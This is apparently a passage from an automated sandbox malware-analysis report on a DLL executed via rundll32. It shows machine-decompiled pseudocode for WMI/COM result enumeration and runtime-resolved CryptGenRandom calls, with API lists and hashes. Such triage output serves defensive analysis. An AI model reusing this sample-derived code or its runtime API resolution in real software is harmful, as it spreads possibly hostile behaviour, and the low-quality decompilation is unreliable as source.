                                                                                                                                                                          						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                          						__eflags = _t188;
                                                                                                                                                                          						if(_t188 >= 0) {
                                                                                                                                                                          							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                          							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                          							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                          							_t253 = _t46;
                                                                                                                                                                          							_t327 = _t252 << 3;
                                                                                                                                                                          							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                          							_t192 = E10009281(_t327, _t47);
                                                                                                                                                                          							__eflags = _t192;
                                                                                                                                                                          							if(_t192 == 0) {
                                                                                                                                                                          								__imp__#16(_v24);
                                                                                                                                                                          								_t193 = _v28;
                                                                                                                                                                          								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                          								L46:
                                                                                                                                                                          								_t252 = _v20;
                                                                                                                                                                          								break;
                                                                                                                                                                          							}
                                                                                                                                                                          							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                          							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100091E7( *(_t327 +  *_t253) << 3);
                                                                                                                                                                          							_t200 =  *_t253;
                                                                                                                                                                          							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                          							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                          								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                          								E10009203(_t136, 0);
                                                                                                                                                                          								E10009203( &_v36, 0);
                                                                                                                                                                          								__imp__#16(_v24);
                                                                                                                                                                          								_t205 = _v28;
                                                                                                                                                                          								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                          								_t320 = _v36;
                                                                                                                                                                          								goto L46;
                                                                                                                                                                          							}
                                                                                                                                                                          							_t207 = _v16;
                                                                                                                                                                          							while(1) {
                                                                                                                                                                          								_v12 = _t207;
                                                                                                                                                                          								__eflags = _t207 - _v48;
                                                                                                                                                                          								if(_t207 > _v48) {
                                                                                                                                                                          									break;
                                                                                                                                                                          								}
                                                                                                                                                                          								_v44 = _v44 & 0x00000000;
                                                                                                                                                                          								_t209 =  &_v12;
                                                                                                                                                                          								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                          								__eflags = _t209;
                                                                                                                                                                          								if(_t209 < 0) {
                                                                                                                                                                          									break;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t212 = E1000984F(_v44);
                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                          								_t213 = _v28;
                                                                                                                                                                          								_t281 =  *_t213;
                                                                                                                                                                          								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                          								__eflags = _t214;
                                                                                                                                                                          								if(_t214 < 0) {
                                                                                                                                                                          									L39:
                                                                                                                                                                          									__imp__#6(_v44);
                                                                                                                                                                          									_t207 = _v12 + 1;
                                                                                                                                                                          									__eflags = _t207;
                                                                                                                                                                          									continue;
                                                                                                                                                                          								}
                                                                                                                                                                          								_v92 = E100091B2(_t281, 0xe23);
                                                                                                                                                                          								 *_t329 = 0x375;
                                                                                                                                                                          								_t217 = E100091B2(_t281);
                                                                                                                                                                          								_t283 = _v80;
                                                                                                                                                                          								_v96 = _t217;
                                                                                                                                                                          								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                          								__eflags = _t218 - 0xb;
                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                          									_t219 = _t218 - 0x10;
                                                                                                                                                                          									__eflags = _t219;
                                                                                                                                                                          									if(_t219 == 0) {
                                                                                                                                                                          										L35:
                                                                                                                                                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100091E7(0x18);
                                                                                                                                                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                          										__eflags = _t289;
                                                                                                                                                                          										if(_t289 == 0) {
                                                                                                                                                                          											L38:
                                                                                                                                                                          											E10009E2E( &_v92);
                                                                                                                                                                          											E10009E2E( &_v96);
                                                                                                                                                                          											__imp__#9( &_v80);
                                                                                                                                                                          											goto L39;
                                                                                                                                                                          										}
                                                                                                                                                                          										_push(_v72);
                                                                                                                                                                          										_push(L"%d");
                                                                                                                                                                          										L37:
                                                                                                                                                                          										_push(0xc);
                                                                                                                                                                          										_push(_t289);
                                                                                                                                                                          										E1000C172();
                                                                                                                                                                          										_t329 = _t329 + 0x10;
                                                                                                                                                                          										goto L38;
                                                                                                                                                                          									}
                                                                                                                                                                          									_t230 = _t219 - 1;
                                                                                                                                                                          									__eflags = _t230;
                                                                                                                                                                          									if(_t230 == 0) {
                                                                                                                                                                          										L33:
                                                                                                                                                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100091E7(0x18);
                                                                                                                                                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                          										__eflags = _t289;
                                                                                                                                                                          										if(_t289 == 0) {
                                                                                                                                                                          											goto L38;
                                                                                                                                                                          										}
                                                                                                                                                                          										_push(_v72);
                                                                                                                                                                          										_push(L"%u");
                                                                                                                                                                          										goto L37;
                                                                                                                                                                          									}
                                                                                                                                                                          									_t235 = _t230 - 1;
                                                                                                                                                                          									__eflags = _t235;
                                                                                                                                                                          									if(_t235 == 0) {
                                                                                                                                                                          										goto L33;
                                                                                                                                                                          									}
                                                                                                                                                                          									__eflags = _t235 == 1;
                                                                                                                                                                          									if(_t235 == 1) {
                                                                                                                                                                          										goto L33;
                                                                                                                                                                          									}
                                                                                                                                                                          									L28:
                                                                                                                                                                          									__eflags = _t283 & 0x00002000;
                                                                                                                                                                          									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                          										_v88 = E100091B2(_t283, 0xedb);
                                                                                                                                                                          										E1000C172( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                          										E10009E2E( &_v88);
                                                                                                                                                                          										_t329 = _t329 + 0x18;
                                                                                                                                                                          										_t298 =  &_v616;
                                                                                                                                                                          										L31:
                                                                                                                                                                          										_t242 = E1000984F(_t298);
                                                                                                                                                                          										L32:
                                                                                                                                                                          										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                          										goto L38;
                                                                                                                                                                          									}
                                                                                                                                                                          									_t242 = E1000D6AF( &_v80);
                                                                                                                                                                          									goto L32;
                                                                                                                                                                          								}
                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                          									__eflags = _v72 - 0xffff;
                                                                                                                                                                          									_t298 = L"TRUE";
                                                                                                                                                                          									if(_v72 != 0xffff) {
                                                                                                                                                                          										_t298 = L"FALSE";
                                                                                                                                                                          									}
                                                                                                                                                                          									goto L31;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t243 = _t218 - 1;
                                                                                                                                                                          								__eflags = _t243;
                                                                                                                                                                          								if(_t243 == 0) {
                                                                                                                                                                          									goto L38;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t244 = _t243 - 1;
                                                                                                                                                                          								__eflags = _t244;
                                                                                                                                                                          								if(_t244 == 0) {
                                                                                                                                                                          									goto L35;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t245 = _t244 - 1;
                                                                                                                                                                          								__eflags = _t245;
                                                                                                                                                                          								if(_t245 == 0) {
                                                                                                                                                                          									goto L35;
                                                                                                                                                                          								}
                                                                                                                                                                          								__eflags = _t245 != 5;
                                                                                                                                                                          								if(_t245 != 5) {
                                                                                                                                                                          									goto L28;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t298 = _v72;
                                                                                                                                                                          								goto L31;
                                                                                                                                                                          							}
                                                                                                                                                                          							__imp__#16(_v24);
                                                                                                                                                                          							_t210 = _v28;
                                                                                                                                                                          							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                          							_t252 = _v20;
                                                                                                                                                                          							L42:
                                                                                                                                                                          							_t262 = _v32;
                                                                                                                                                                          							_t252 = _t252 + 1;
                                                                                                                                                                          							_v20 = _t252;
                                                                                                                                                                          							__eflags = _t262;
                                                                                                                                                                          							if(_t262 != 0) {
                                                                                                                                                                          								continue;
                                                                                                                                                                          							}
                                                                                                                                                                          							L48:
                                                                                                                                                                          							_t324 = _v40;
                                                                                                                                                                          							goto L49;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t247 = _v28;
                                                                                                                                                                          						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                          						goto L42;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t262 = _v32;
                                                                                                                                                                          					goto L48;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					E10009203( &_v36, _t322);
                                                                                                                                                                          					_t320 = _v36;
                                                                                                                                                                          					goto L53;
                                                                                                                                                                          				}
                                                                                                                                                                          			}





































































                                                                                                                                                                          0x1000d7d4
                                                                                                                                                                          0x1000d7da
                                                                                                                                                                          0x1000d7e1
                                                                                                                                                                          0x1000d7e4
                                                                                                                                                                          0x1000d7e7
                                                                                                                                                                          0x1000d7ec
                                                                                                                                                                          0x1000d7ee
                                                                                                                                                                          0x1000d7f3
                                                                                                                                                                          0x1000dc3b
                                                                                                                                                                          0x1000dc3b
                                                                                                                                                                          0x1000d800
                                                                                                                                                                          0x1000d802
                                                                                                                                                                          0x1000d805
                                                                                                                                                                          0x1000d808
                                                                                                                                                                          0x1000dc20
                                                                                                                                                                          0x1000dc26
                                                                                                                                                                          0x1000dc30
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dc35
                                                                                                                                                                          0x1000d813
                                                                                                                                                                          0x1000d81a
                                                                                                                                                                          0x1000d821
                                                                                                                                                                          0x1000d824
                                                                                                                                                                          0x1000d829
                                                                                                                                                                          0x1000d82b
                                                                                                                                                                          0x1000d82e
                                                                                                                                                                          0x1000d831
                                                                                                                                                                          0x1000d832
                                                                                                                                                                          0x1000d83b
                                                                                                                                                                          0x1000d841
                                                                                                                                                                          0x1000d844
                                                                                                                                                                          0x1000d84d
                                                                                                                                                                          0x1000d852
                                                                                                                                                                          0x1000d857
                                                                                                                                                                          0x1000d86e
                                                                                                                                                                          0x1000d87b
                                                                                                                                                                          0x1000d87e
                                                                                                                                                                          0x1000d885
                                                                                                                                                                          0x1000d88a
                                                                                                                                                                          0x1000d891
                                                                                                                                                                          0x1000d896
                                                                                                                                                                          0x1000d89d
                                                                                                                                                                          0x1000d89f
                                                                                                                                                                          0x1000d8ab
                                                                                                                                                                          0x1000d8ae
                                                                                                                                                                          0x1000d8b0
                                                                                                                                                                          0x1000dc10
                                                                                                                                                                          0x1000dc11
                                                                                                                                                                          0x1000dc1a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dc1a
                                                                                                                                                                          0x1000d8b6
                                                                                                                                                                          0x1000d8b9
                                                                                                                                                                          0x1000d8bc
                                                                                                                                                                          0x1000d8bf
                                                                                                                                                                          0x1000d8c1
                                                                                                                                                                          0x1000dbdc
                                                                                                                                                                          0x1000dbdf
                                                                                                                                                                          0x1000dbe2
                                                                                                                                                                          0x1000dbe4
                                                                                                                                                                          0x1000dc06
                                                                                                                                                                          0x1000dc0b
                                                                                                                                                                          0x1000dbe6
                                                                                                                                                                          0x1000dbe9
                                                                                                                                                                          0x1000dbf4
                                                                                                                                                                          0x1000dbfb
                                                                                                                                                                          0x1000dbfb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d8c7
                                                                                                                                                                          0x1000d8c7
                                                                                                                                                                          0x1000d8d9
                                                                                                                                                                          0x1000d8dc
                                                                                                                                                                          0x1000d8de
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d8e6
                                                                                                                                                                          0x1000d8e9
                                                                                                                                                                          0x1000d8ec
                                                                                                                                                                          0x1000d8ef
                                                                                                                                                                          0x1000d8f2
                                                                                                                                                                          0x1000d8f5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d8fb
                                                                                                                                                                          0x1000d909
                                                                                                                                                                          0x1000d90c
                                                                                                                                                                          0x1000d90e
                                                                                                                                                                          0x1000d927
                                                                                                                                                                          0x1000d936
                                                                                                                                                                          0x1000d93e
                                                                                                                                                                          0x1000d93e
                                                                                                                                                                          0x1000d941
                                                                                                                                                                          0x1000d948
                                                                                                                                                                          0x1000d94c
                                                                                                                                                                          0x1000d952
                                                                                                                                                                          0x1000d954
                                                                                                                                                                          0x1000dbc4
                                                                                                                                                                          0x1000dbca
                                                                                                                                                                          0x1000dbd0
                                                                                                                                                                          0x1000dbd3
                                                                                                                                                                          0x1000dbd3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dbd3
                                                                                                                                                                          0x1000d963
                                                                                                                                                                          0x1000d977
                                                                                                                                                                          0x1000d97b
                                                                                                                                                                          0x1000d97d
                                                                                                                                                                          0x1000d982
                                                                                                                                                                          0x1000db91
                                                                                                                                                                          0x1000db97
                                                                                                                                                                          0x1000dba2
                                                                                                                                                                          0x1000dbad
                                                                                                                                                                          0x1000dbb3
                                                                                                                                                                          0x1000dbb9
                                                                                                                                                                          0x1000dbbc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dbbc
                                                                                                                                                                          0x1000d988
                                                                                                                                                                          0x1000db5f
                                                                                                                                                                          0x1000db5f
                                                                                                                                                                          0x1000db62
                                                                                                                                                                          0x1000db65
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d990
                                                                                                                                                                          0x1000d998
                                                                                                                                                                          0x1000d99f
                                                                                                                                                                          0x1000d9a5
                                                                                                                                                                          0x1000d9a7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d9b0
                                                                                                                                                                          0x1000d9c5
                                                                                                                                                                          0x1000d9cb
                                                                                                                                                                          0x1000d9d4
                                                                                                                                                                          0x1000d9d7
                                                                                                                                                                          0x1000d9da
                                                                                                                                                                          0x1000d9dc
                                                                                                                                                                          0x1000db52
                                                                                                                                                                          0x1000db55
                                                                                                                                                                          0x1000db5e
                                                                                                                                                                          0x1000db5e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000db5e
                                                                                                                                                                          0x1000d9ec
                                                                                                                                                                          0x1000d9ef
                                                                                                                                                                          0x1000d9f6
                                                                                                                                                                          0x1000d9fc
                                                                                                                                                                          0x1000d9ff
                                                                                                                                                                          0x1000da02
                                                                                                                                                                          0x1000da05
                                                                                                                                                                          0x1000da08
                                                                                                                                                                          0x1000da44
                                                                                                                                                                          0x1000da44
                                                                                                                                                                          0x1000da47
                                                                                                                                                                          0x1000daf3
                                                                                                                                                                          0x1000db07
                                                                                                                                                                          0x1000db17
                                                                                                                                                                          0x1000db1b
                                                                                                                                                                          0x1000db1d
                                                                                                                                                                          0x1000db34
                                                                                                                                                                          0x1000db38
                                                                                                                                                                          0x1000db41
                                                                                                                                                                          0x1000db4c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000db4c
                                                                                                                                                                          0x1000db23
                                                                                                                                                                          0x1000db24
                                                                                                                                                                          0x1000db29
                                                                                                                                                                          0x1000db29
                                                                                                                                                                          0x1000db2b
                                                                                                                                                                          0x1000db2c
                                                                                                                                                                          0x1000db31
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000db31
                                                                                                                                                                          0x1000da4d
                                                                                                                                                                          0x1000da4d
                                                                                                                                                                          0x1000da50
                                                                                                                                                                          0x1000dabb
                                                                                                                                                                          0x1000dacf
                                                                                                                                                                          0x1000dadf
                                                                                                                                                                          0x1000dae3
                                                                                                                                                                          0x1000dae5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000daeb
                                                                                                                                                                          0x1000daec
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000daec
                                                                                                                                                                          0x1000da52
                                                                                                                                                                          0x1000da52
                                                                                                                                                                          0x1000da55
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da57
                                                                                                                                                                          0x1000da5a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da5c
                                                                                                                                                                          0x1000da5c
                                                                                                                                                                          0x1000da62
                                                                                                                                                                          0x1000da7e
                                                                                                                                                                          0x1000da8d
                                                                                                                                                                          0x1000da96
                                                                                                                                                                          0x1000da9b
                                                                                                                                                                          0x1000da9e
                                                                                                                                                                          0x1000daa4
                                                                                                                                                                          0x1000daa4
                                                                                                                                                                          0x1000daa9
                                                                                                                                                                          0x1000dab5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dab5
                                                                                                                                                                          0x1000da67
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da67
                                                                                                                                                                          0x1000da0a
                                                                                                                                                                          0x1000da31
                                                                                                                                                                          0x1000da36
                                                                                                                                                                          0x1000da3b
                                                                                                                                                                          0x1000da3d
                                                                                                                                                                          0x1000da3d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da3b
                                                                                                                                                                          0x1000da0c
                                                                                                                                                                          0x1000da0c
                                                                                                                                                                          0x1000da0f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da15
                                                                                                                                                                          0x1000da15
                                                                                                                                                                          0x1000da18
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da1e
                                                                                                                                                                          0x1000da1e
                                                                                                                                                                          0x1000da21
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da27
                                                                                                                                                                          0x1000da2a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da2c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000da2c
                                                                                                                                                                          0x1000db6e
                                                                                                                                                                          0x1000db74
                                                                                                                                                                          0x1000db7a
                                                                                                                                                                          0x1000db7d
                                                                                                                                                                          0x1000db80
                                                                                                                                                                          0x1000db80
                                                                                                                                                                          0x1000db83
                                                                                                                                                                          0x1000db84
                                                                                                                                                                          0x1000db87
                                                                                                                                                                          0x1000db89
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dbd9
                                                                                                                                                                          0x1000dbd9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dbd9
                                                                                                                                                                          0x1000d910
                                                                                                                                                                          0x1000d916
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d916
                                                                                                                                                                          0x1000dbd6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d859
                                                                                                                                                                          0x1000d85e
                                                                                                                                                                          0x1000d863
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d867

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1000D2F7: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D30A
                                                                                                                                                                            • Part of subcall function 1000D2F7: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D31B
                                                                                                                                                                            • Part of subcall function 1000D2F7: CoCreateInstance.OLE32(1001D848,00000000,00000001,1001D858,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D332
                                                                                                                                                                            • Part of subcall function 1000D2F7: SysAllocString.OLEAUT32(00000000), ref: 1000D33D
                                                                                                                                                                            • Part of subcall function 1000D2F7: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D368
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D874
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D888
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 1000DC11
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 1000DC1A
                                                                                                                                                                            • Part of subcall function 10009203: HeapFree.KERNEL32(00000000,00000000), ref: 10009249
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
                                                                                                                                                                          • String ID: FALSE$TRUE
                                                                                                                                                                          • API String ID: 318989454-1412513891
                                                                                                                                                                          • Opcode ID: 919d23eae1f380bfe7b5be4e16ac5c52cd0d3706257f31220665b853bc84d9e5
                                                                                                                                                                          • Instruction ID: 5aa9c036717eb5a5c9b7cbab616e939d641ea401ff5d011f55a91f8be1bcc091
                                                                                                                                                                          • Opcode Fuzzy Hash: 919d23eae1f380bfe7b5be4e16ac5c52cd0d3706257f31220665b853bc84d9e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 63E17275E00219EFEB04EFE4C885EEEBBB9FF49340F10455AE505A7289DB71A941CB60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                          			E10013259(intOrPtr* _a4) {
                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                          				char _v16;
                                                                                                                                                                          				_Unknown_base(*)()* _t15;
                                                                                                                                                                          				void* _t20;
                                                                                                                                                                          				intOrPtr* _t25;
                                                                                                                                                                          				intOrPtr* _t29;
                                                                                                                                                                          				struct HINSTANCE__* _t30;
                                                                                                                                                                          
                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                          				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                          					L7:
                                                                                                                                                                          					return 1;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                          				if(_t25 == 0) {
                                                                                                                                                                          					goto L7;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                          				_v12 = _t15;
                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                          					goto L7;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                          				if(_t29 == 0) {
                                                                                                                                                                          					goto L7;
                                                                                                                                                                          				}
                                                                                                                                                                          				_push(0xf0000000);
                                                                                                                                                                          				_push(1);
                                                                                                                                                                          				_push(0);
                                                                                                                                                                          				_push(0);
                                                                                                                                                                          				_push( &_v8);
                                                                                                                                                                          				if( *_t25() == 0) {
                                                                                                                                                                          					goto L7;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                          				 *_t29(_v8, 0);
                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                          					goto L7;
                                                                                                                                                                          				}
                                                                                                                                                                          				 *_a4 = E100131B4( &_v16);
                                                                                                                                                                          				return 0;
                                                                                                                                                                          			}











                                                                                                                                                                          0x1001325f
                                                                                                                                                                          0x10013271
                                                                                                                                                                          0x10013275
                                                                                                                                                                          0x100132e9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100132eb
                                                                                                                                                                          0x10013285
                                                                                                                                                                          0x10013289
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10013291
                                                                                                                                                                          0x10013293
                                                                                                                                                                          0x10013298
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100132a2
                                                                                                                                                                          0x100132a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100132a8
                                                                                                                                                                          0x100132ad
                                                                                                                                                                          0x100132af
                                                                                                                                                                          0x100132b1
                                                                                                                                                                          0x100132b6
                                                                                                                                                                          0x100132bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100132c6
                                                                                                                                                                          0x100132d0
                                                                                                                                                                          0x100132d4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100132e3
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,10008254,00000000), ref: 1001326B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10013283
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 10013291
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 100132A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                          • API String ID: 667068680-129414566
                                                                                                                                                                          • Opcode ID: ecc3d0c9c8d29e75a8d695109f5af85a5ebb6e8c0cf637ab81bd802e9145332d
                                                                                                                                                                          • Instruction ID: 44cfbbe63dd5ec5fb2c5023fe683171a121c93bc589d1a284ce58b4995778660
                                                                                                                                                                          • Opcode Fuzzy Hash: ecc3d0c9c8d29e75a8d695109f5af85a5ebb6e8c0cf637ab81bd802e9145332d
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D118236A00619B7DB11E6E98C45F9EB7ECDF45650F114072FA00EA140DB76DA848698
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                          			E1000F11F(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                          				char _v16;
                                                                                                                                                                          				char _v20;
                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                          				char _v32;
                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                          				char _v64;
                                                                                                                                                                          				int _v76;
                                                                                                                                                                          				void* _v80;
                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                          				int _v104;
                                                                                                                                                                          				void* _v108;
                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                          				intOrPtr _v116;
                                                                                                                                                                          				char* _v120;
                                                                                                                                                                          				char _v124;
                                                                                                                                                                          				char _v140;
                                                                                                                                                                          				void _v396;
                                                                                                                                                                          				void _v652;
                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                          				intOrPtr _t99;
                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                          				intOrPtr _t106;
                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                          				void* _t108;
                                                                                                                                                                          				intOrPtr _t109;
                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                          				intOrPtr _t112;
                                                                                                                                                                          				char _t114;
